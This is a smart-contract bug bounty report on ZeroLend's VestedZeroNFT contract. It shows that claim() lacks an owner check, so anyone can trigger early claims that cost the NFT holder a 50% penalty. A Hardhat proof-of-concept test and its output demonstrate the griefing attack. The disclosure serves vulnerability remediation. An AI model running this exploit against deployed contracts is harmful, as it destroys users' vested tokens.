29139 - [SC - Medium] Griefing attack to cause users to suffer penalt...
Griefing attack to cause users to suffer penalty by calling the tokenId of another user that have VestedZeroNFT id with _hasPenalty is true
Submitted on Mar 8th 2024 at 10:00:01 UTC by @perseverance for Boost | ZeroLend
Report ID: #29139
Report type: Smart Contract
Report severity: Medium
Target: https://github.com/zerolend/governance
Impacts:
Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)
Description
Description
Griefing attack to cause users to suffer penalty by calling the tokenId of another user that have VestedZeroNFT id with _hasPenalty is true
Brief/Intro
VestedZeroNFT is a NFT based contract to hold all the user vests. NFTs can be traded on secondary marketplaces like Opensea, can be split into smaller chunks to allow for smaller otc deals to happen in secondary markets.
When mint a NFT tokenIT for a user, the function mint() can be used
functionclaim(uint256 id ) publicnonReentrantwhenNotPausedreturns (uint256 toClaim) {require(!frozen[id],"frozen"); LockDetails memory lock = tokenIdToLockDetails[id];if (lock.hasPenalty) {// if the user hasn't claimed before, then calculate how much penalty should be charged// and send the remaining tokens to the userif (lock.pendingClaimed ==0) {uint256 _penalty =penalty(id); toClaim += lock.pending - _penalty; lock.pendingClaimed = lock.pending;// send the penalty tokens back to the staking bonus// contract (used for staking bonuses) zero.transfer(stakingBonus, _penalty); } } else { (uint256 _upfront,uint256 _pending) =claimable(id);// handle vesting without penalties// handle the upfront vestingif (_upfront >0&& lock.upfrontClaimed ==0) { toClaim += _upfront; lock.upfrontClaimed = _upfront; }// handle the linear vestingif (_pending >0&& lock.pendingClaimed >=0) { toClaim += _pending - lock.pendingClaimed; lock.pendingClaimed += _pending - lock.pendingClaimed; } } tokenIdToLockDetails[id] = lock;if (toClaim >0) zero.transfer(ownerOf(id), toClaim); }
So the design of the protocol is, if users need to claim after some time after minting (after the maturity date), then users can claim without the penalty.
But if the users claim before the maturity date, then user will suffer some penalty. The penalty amount of Zero token is sent to the StakingBonus and the rest is sent to the owner of the tokenId.
So the penalty is designed for early withdrawal as commented below.
if (token == zero) {
// if the token is ZERO; then vest it linearly for 3 months with a pentalty for
// early withdrawals.
vesting.mint(
account, // address _who,
_reward, // uint256 _pending,
0, // uint256 _upfront,
86400 * 30 * 3, // uint256 _linearDuration,
0, // uint256 _cliffDuration,
0, // uint256 _unlockDate,
true, // bool _hasPenalty,
IVestedZeroNFT.VestCategory.NORMAL // VestCategory _category
);
} else token.safeTransfer(account, _reward);
Vulnerability Details
So the vulnerability here is the claim function does not check the caller msg.sender is owner of this tokenId. So a hacker can call the claim of the tokenId before maturity date thus make the user to loose his zero token and suffer the penalty. This is not desirable by the ownerof of the tokenId.
Impacts
About the severity assessment
So the bug allow griefing attack that don't bring benefit to the hacker that cause damage to users. So the Severity is Medium with Category: Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)
Proof of Concept
Test case to demonstrate the bug
it("Griefing attack to cause users to loose zero token",asyncfunction () {console.log("Mint a VestedZeroNFT for Ant by calling mint() function of VestedZeroNFT contract"); let tokenId =awaitvest.mint(ant.address, e18 *20n,// 20 ZERO linear vesting0,// 0 ZERO upfront1000,// linear duration - 1000 seconds0,// cliff duration - 0 seconds now +1000,// unlock datetrue,// penalty -> true0 );const [attacker] =awaithre.ethers.getSigners();console.log("Zero balance of Ant",awaitzero.balanceOf(ant.address));console.log("Zero balance of vestZeroNFT contract",awaitzero.balanceOf(vest.target));let lastTokenId =awaitvest.lastTokenId();console.log("Ant address: ",ant.address);console.log("The hacker call the claim function of the vestZeroNFT contract to claim tokenID of Ant"); console.log("The address of the owner of the TokenId: ",awaitvest.ownerOf(lastTokenId));console.log("Zero balance of StakingBonus before the attack",awaitzero.balanceOf(stakingBonus.target));awaitvest.connect(attacker).claim(lastTokenId); console.log("Zero balance of Ant after griefing attack",awaitzero.balanceOf(ant.address));console.log("Zero balance of vestZeroNFT after attack",awaitzero.balanceOf(vest.target));console.log("Zero balance of StakingBonus before the attack",awaitzero.balanceOf(stakingBonus.target));console.log("The unclaimed amount of the tokenID",awaitvest.unclaimed(lastTokenId)); });
Test Log: https://drive.google.com/file/d/1oRfOksMKoIDuJzXbGlB-FcXaxta9lX9b/view?usp=sharing
Mint a VestedZeroNFT for Ant by calling mint() function of VestedZeroNFT contract
Zero balance of Ant 0n
Zero balance of vestZeroNFT contract 20000000000000000000n
Ant address: 0x70997970C51812dc3A010C7d01b50e0d17dc79C8
The hacker call the claim function of the vestZeroNFT contract to claim tokenID of Ant
The address of the owner of the TokenId: 0x70997970C51812dc3A010C7d01b50e0d17dc79C8
Zero balance of StakingBonus before the attack 0n
Zero balance of Ant after griefing attack 10000000000000000000n
Zero balance of vestZeroNFT after attack 0n
Zero balance of StakingBonus before the attack 10000000000000000000n
The unclaimed amount of the tokenID 0n
✔ Griefing attack to cause users to loose zero token (106ms)
So when mint for the user Ant, 20 Zero is spent. So here the attacker call the claim function for the tokenId of Ant. Now after claim, Ant has received only 10 Zero and the unclaimed amount is 0. 10 Zero is sent to StakingBonus contract. So Ant lost 10 Zero token, means 50% as the penalty.
